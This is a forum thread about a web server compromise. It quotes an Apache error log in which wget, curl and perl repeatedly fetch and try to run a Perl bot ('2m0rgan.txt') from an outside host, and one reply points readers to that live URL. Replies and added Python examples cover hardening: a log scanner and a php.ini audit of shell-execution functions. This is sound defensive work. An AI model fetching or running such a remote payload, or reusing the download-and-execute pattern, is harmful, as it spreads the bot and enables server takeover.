Possible security flaw
Hi,
I would appreciate opinions on a situation I detected on one of my company's web servers.
From what the logs show, I think there may be a security breach in Apache, or iptables is not working correctly.
I found the following in Apache's error.log:
--22:22:23-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 115.03 KB/s
22:22:23 (115.03 KB/s) - `2m0rgan.txt' saved [29940/29940]
--22:22:24-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... --22:22:27-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 56.94 KB/s
22:22:28 (56.94 KB/s) - `2m0rgan.txt' saved [29940/29940]
sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.
100 29940 100 29940 0 0 32649 0 --:--:-- --:--:-- --:--:-- 44094
--22:22:30-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 68.30 KB/s
utime(2m0rgan.txt.1): No such file or directory
22:22:31 (68.30 KB/s) - `2m0rgan.txt.1' saved [29940/29940]
sh: print: command not found
--22:22:31-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.
100 29940 100 29940 0 0 42051 0 --:--:-- --:--:-- --:--:-- 60853
sh: fetch: command not found
--22:22:32-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 84.85 KB/s
22:22:33 (84.85 KB/s) - `2m0rgan.txt.1' saved [29940/29940]
sh: print: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:33-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... ..
100 29940 100 29940 0 0 50791 0 --:--:-- --:--:-- --:--:-- 87034
.......sh: fetch: command not found
. ......... 100% 33.99 KB/s
22:22:34 (33.99 KB/s) - `2m0rgan.txt' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
14 29940 14 4344 0 0 10803 0 0:00:02 --:--:-- 0:00:02 10803--22:22:35-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt.1'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K ........
100 29940 100 29940 0 0 32974 0 --:--:-- --:--:-- --:--:-- 50685
.. .......... ..Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
sh: fetch: command not found
....... 100% 87.47 KB/s
utime(2m0rgan.txt.1): No such file or directory
22:22:35 (87.47 KB/s) - `2m0rgan.txt.1' saved [29940/29940]
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 39766 0 --:--:-- --:--:-- --:--:-- 58135
--22:22:37-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.
--22:22:38-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... sh: fetch: command not found
200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 48.37 KB/s
22:22:39 (48.37 KB/s) - `2m0rgan.txt.1' saved [29940/29940]
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:40-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 68.64 KB/s
22:22:41 (68.64 KB/s) - `2m0rgan.txt' saved [29940/29940]
sh: print: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:-- 0
100 29940 100 29940 0 0 8186 0 0:00:03 0:00:03 --:--:-- 70613
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
sh: fetch: command not found
--22:22:45-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 86.04 KB/s
22:22:46 (86.04 KB/s) - `2m0rgan.txt' saved [29940/29940]
sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
100 29940 100 29940 0 0 5364 0 0:00:05 0:00:05 --:--:-- 88318
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
19 29940 19 5792 0 0 7335 0 0:00:04 --:--:-- 0:00:04 33871
100 29940 100 29940 0 0 21518 0 0:00:01 0:00:01 --:--:-- 38732
--22:22:48-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.
Missing right curly or square bracket at 2m0rgan.txt line 281, at end of line
syntax error at 2m0rgan.txt line 281, at EOF
Execution of 2m0rgan.txt aborted due to compilation errors.
sh: fetch: command not found
--22:22:49-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... .....sh: fetch: command not found
.... 100% 68.53 KB/s
utime(2m0rgan.txt.1): No such file or directory
22:22:50 (68.53 KB/s) - `2m0rgan.txt.1' saved [29940/29940]
sh: print: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:50-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 85.76 KB/s
22:22:51 (85.76 KB/s) - `2m0rgan.txt' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
57 29940 57 17376 0 0 36764 0 --:--:-- --:--:-- --:--:-- 70634
100 29940 100 29940 0 0 53449 0 --:--:-- --:--:-- --:--:-- 89909
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:52-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
100 29940 100 29940 0 0 5315 0 0:00:05 0:00:05 --:--:-- 89107
sh: fetch: command not found
217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 85.26 KB/s
22:23:05 (85.26 KB/s) - `2m0rgan.txt' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 46763 0 --:--:-- --:--:-- --:--:-- 72144
--22:23:08-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt.1'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... ..sh: fetch: command not found
........ ......... 100% 68.22 KB/s
utime(2m0rgan.txt.1): No such file or directory
22:23:08 (68.22 KB/s) - `2m0rgan.txt.1' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
14 29940 14 4344 0 0 13136 0 0:00:02 --:--:-- 0:00:02 49931
100 29940 100 29940 0 0 50765 0 --:--:-- --:--:-- --:--:-- 86531
sh: fetch: command not found
--22:23:23-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 84.51 KB/s
22:23:23 (84.51 KB/s) - `2m0rgan.txt' saved [29940/29940]
sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 52831 0 --:--:-- --:--:-- --:--:-- 88842
sh: fetch: command not found
--22:23:27-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... --22:23:31-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .....217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... ..... ....connected.
HTTP request sent, awaiting response... ..200 OK
Length: 29,940 (29K) [text/plain]
0K ...... .............. ........ 100% 49.71 KB/s
22:23:32 (49.71 KB/s) - `2m0rgan.txt' saved [29940/29940]
..... ....sh: print: command not found
..... 100% 86.93 KB/s
22:23:32 (86.93 KB/s) - `2m0rgan.txt' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 52761 0 --:--:-- --:--:-- --:--:-- 89373
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- 0:00:08 --:--:-- 0--22:23:41-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt.1'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response...
100 29940 100 29940 0 0 3492 0 0:00:08 0:00:08 --:--:-- 88318
200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 56.97 KB/s
utime(2m0rgan.txt.1): No such file or directory
22:23:41 (56.97 KB/s) - `2m0rgan.txt.1' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 45555 0 --:--:-- --:--:-- --:--:-- 70947
sh: fetch: command not found
sh: fetch: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:24:10-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 68.89 KB/s
22:24:11 (68.89 KB/s) - `2m0rgan.txt' saved [29940/29940]
sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 40538 0 --:--:-- --:--:-- --:--:-- 59053
sh: fetch: command not found
--22:24:14-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 37.83 KB/s
22:24:15 (37.83 KB/s) - `2m0rgan.txt' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
33 29940 33 10136 0 0 25252 0 0:00:01 --:--:-- 0:00:01 59274
100 29940 100 29940 0 0 45618 0 --:--:-- --:--:-- --:--:-- 70281
sh: fetch: command not found
--22:26:05-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 85.12 KB/s
22:26:05 (85.12 KB/s) - `2m0rgan.txt' saved [29940/29940]
sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
100 29940 100 29940 0 0 5385 0 0:00:05 0:00:05 --:--:-- 89107
sh: fetch: command not found
--22:26:19-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.
--22:26:53-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
0K .......... .......... ......... 100% 84.94 KB/s
22:26:54 (84.94 KB/s) - `2m0rgan.txt' saved [29940/29940]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
86 29940 86 26064 0 0 4670 0 0:00:06 0:00:05 0:00:01 74896
100 29940 100 29940 0 0 5364 0 0:00:05 0:00:05 --:--:-- 85787
sh: fetch: command not found
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
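What the log above actually shows is the stderr of command-line download clients (wget's progress lines, curl's progress table, "sh: fetch: command not found", perl diagnostics) landing in the web server's error log, which only happens when a process spawned by the web server writes there. The following is an added example, not code from the thread, that scans error.log lines for exactly those signatures so the condition can be detected and counted rather than read by eye. The sample lines are constructed to mirror the post; the function and variable names are this example's own.

```python
import re
from collections import Counter

# Constructed sample, modelled on the downloader output quoted in the post
# (wget progress, "sh: X: command not found", curl's progress-table header,
# perl diagnostics) plus one ordinary Apache error line. Not a real log.
SAMPLE_ERROR_LOG = """\
--22:22:23-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
22:22:23 (115.03 KB/s) - `2m0rgan.txt' saved [29940/29940]
sh: print: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
sh: fetch: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
connect: Connection refused at 2m0rgan.txt line 450.
[Tue Mar 13 22:30:00 2007] [error] [client 10.0.0.5] File does not exist: /var/www/favicon.ico
"""

# Signatures of tools that have no business writing to Apache's error log.
# All use search(), because the post shows several outputs interleaved on
# one line when wget, curl and perl run concurrently.
WGET_REQUEST = re.compile(r"--\d{2}:\d{2}:\d{2}--\s+(\S+://\S+)")
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/\d+\]")
CMD_NOT_FOUND = re.compile(r"\bsh: (\S+): command not found")
CURL_PROGRESS = re.compile(r"% Total\s+% Received\s+% Xferd")
PERL_SCRIPT = re.compile(r"""Can't open perl script "([^"]+)"|\bat (\S+) line \d+""")


def scan_error_log(lines):
    """Collect indicators of download/exec tools spawned by the web server.

    A healthy error.log never contains this output; its presence means a
    child process of the server (for instance one started through a PHP
    injection) wrote its stdout/stderr to the log.
    """
    found = {
        "download_urls": Counter(),   # URLs fetched by wget
        "saved_files": [],            # (filename, bytes) wget wrote to disk
        "missing_tools": Counter(),   # tools the attacker tried but are absent
        "curl_invocations": 0,        # curl progress tables seen
        "perl_scripts": set(),        # scripts perl was asked to run
    }
    for line in lines:
        if m := WGET_REQUEST.search(line):
            found["download_urls"][m.group(1)] += 1
        if m := WGET_SAVED.search(line):
            found["saved_files"].append((m.group(1), int(m.group(2))))
        if m := CMD_NOT_FOUND.search(line):
            found["missing_tools"][m.group(1)] += 1
        if CURL_PROGRESS.search(line):
            found["curl_invocations"] += 1
        if m := PERL_SCRIPT.search(line):
            found["perl_scripts"].add(m.group(1) or m.group(2))
    return found


def is_suspicious(found):
    """True when any downloader or interpreter output reached the error log."""
    return bool(found["download_urls"] or found["saved_files"]
                or found["missing_tools"] or found["curl_invocations"]
                or found["perl_scripts"])


if __name__ == "__main__":
    result = scan_error_log(SAMPLE_ERROR_LOG.splitlines())
    print("suspicious:", is_suspicious(result))
    for key, value in result.items():
        print(f"  {key}: {value}")
```

Run it against the real file with `scan_error_log(open("/var/log/apache2/error.log"))`; the URLs and saved filenames tell you what was dropped into the web server's working directory (and under which user, if you match the timestamps against access.log), and the "command not found" entries tell you which downloaders the attacker fell back on when the first choice was unavailable.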
Re: Possible security flaw
That looks more like a user trying to download an IRC bot written in Perl than a security flaw...
I don't know, but if you are one of those paranoid admins, there is a way to block URLs by a substring of the URL.
That is, you can block the download of that file by blocking URLs that contain the string 2m0rgan, for example.
Hope that helps, see you.
Re: Possible security flaw
That looks like a wget log to me... not Apache's..
Still, it is possible that this is a worm trying to install a bot or a backdoor...
And blocking the URL is no use.. because if it is already trying to install something, it has already gotten in; now the rest is analysis...
Check whether you have some vulnerable site/application..
99% of the time it is due to bad programming on our clients' sites..
I myself keep all my clients on a very restrictive php.ini, because I know many of them make very serious mistakes when programming their sites, and my server is the one that pays for it..
Many web pages suffer from "include" bugs.. check whether that's it...
And another thing.. do a chmod 700 on wget, fetch, lynx, curl.. and perl...
And I advise you to stay alert to any suspicious activity ;)
Cheers.
Re: Possible security flaw
Man...
You can test this server with Nessus; if there is any security flaw it will tell you, and it even tells you how to fix it :)
Cheers
Re: Possible security flaw
Sorry to say, Nessus won't help.
The morgan bot is a Perl script that scans Google for PHP injection flaws. When it finds a vulnerable machine it uses the commands wget, lwp-download, curl, fetch (BSD) and lynx to download itself onto the machine. Once inside the machine, it becomes one more zombie machine. Your problem is easy to fix. Disable passthru, shell_exec and system() in php.ini.
Hope that helps.
Anything else, find me on MSN. [email protected]
Cheers
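Two replies above converge on php.ini: a "very restrictive" configuration, and specifically disabling passthru, shell_exec and system(). Below is an added example, not from the thread, that reads a php.ini and reports whether those functions are in disable_functions and whether the remote-include switches are on. The three function names come from the reply; exec, popen and proc_open, and the allow_url_fopen / allow_url_include checks (the settings behind the "include" bugs the earlier reply mentions), are this example's own additions. Both sample php.ini files are constructed.

```python
import re

# Functions named in the reply above (passthru, shell_exec, system). The
# rest (exec, popen, proc_open) are this example's assumption: they give the
# same "run a shell command" capability and are normally disabled together.
SHELL_FUNCTIONS = {"passthru", "shell_exec", "system", "exec", "popen", "proc_open"}

# Remote-include switches with PHP's built-in defaults when the key is absent
# (allow_url_fopen defaults to On, allow_url_include to Off).
URL_SETTINGS = {"allow_url_fopen": "1", "allow_url_include": "0"}

# Constructed samples; neither is a real php.ini from the thread.
WEAK_INI = """\
[PHP]
; permissive: an injected PHP snippet can spawn wget/curl/perl freely
allow_url_fopen = On
allow_url_include = On
disable_functions =
"""

HARDENED_INI = """\
[PHP]
allow_url_fopen = Off
allow_url_include = Off
disable_functions = "passthru,shell_exec,system,exec,popen,proc_open"
"""


def parse_php_ini(text):
    """Minimal php.ini reader: `key = value` lines, ';' comments, [sections] ignored."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    """php.ini accepts several spellings for a true value."""
    return value.strip().lower() in ("1", "on", "true", "yes")


def audit_php_ini(text):
    """Return a list of findings; an empty list means the checks pass."""
    settings = parse_php_ini(text)
    disabled = {f.strip().lower()
                for f in settings.get("disable_functions", "").split(",")
                if f.strip()}
    findings = []
    missing = sorted(SHELL_FUNCTIONS - disabled)
    if missing:
        findings.append("disable_functions lacks: " + ", ".join(missing))
    for key, default in URL_SETTINGS.items():
        if is_on(settings.get(key, default)):
            findings.append(f"{key} is enabled")
    return findings


def hardened_disable_functions(existing=""):
    """Merge the recommended functions into an existing disable_functions value."""
    current = {f.strip() for f in existing.split(",") if f.strip()}
    return 'disable_functions = "' + ",".join(sorted(current | SHELL_FUNCTIONS)) + '"'


if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{name}: {audit_php_ini(ini) or 'OK'}")
    print(hardened_disable_functions("mail"))
```

disable_functions is read only when PHP starts, so the web server has to be restarted for a change to take effect, and it is a per-installation setting that a script cannot override with ini_set(). Turning allow_url_fopen off is stricter than the reply asks for and can break applications that legitimately fetch URLs with file_get_contents(); allow_url_include is the one that matters for remote include bugs and is safe to leave off. The chmod 700 on wget, curl, fetch, lynx and perl suggested earlier in the thread is complementary: it limits what a shell can do if one of the functions was missed.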
Re: Possible security flaw
Interesting to know that...
Since I don't have much experience with Apache servers, this information was useful to me.
Re: Possible security flaw
Exactly... just as I suspected...
Go to the site and see
http://icezinhu.by.ru/2m0rgan.txt
the worm's code...
Really, mate, your problem is indeed in the PHP configuration...
As I said, our servers end up paying for our clients' bad programming..
Stay alert..